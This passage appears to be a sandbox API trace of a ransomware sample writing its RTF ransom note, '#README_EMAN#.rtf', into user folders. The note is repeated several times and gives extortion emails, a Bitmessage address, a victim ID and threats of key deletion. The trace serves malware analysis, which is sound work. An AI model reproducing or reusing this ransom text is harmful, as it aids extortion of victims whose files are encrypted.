b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.266] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.267] CloseHandle (hObject=0x2e8) returned 1 [0285.267] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0285.267] GetLastError () returned 0x2 [0285.267] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.293] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.293] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.293] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 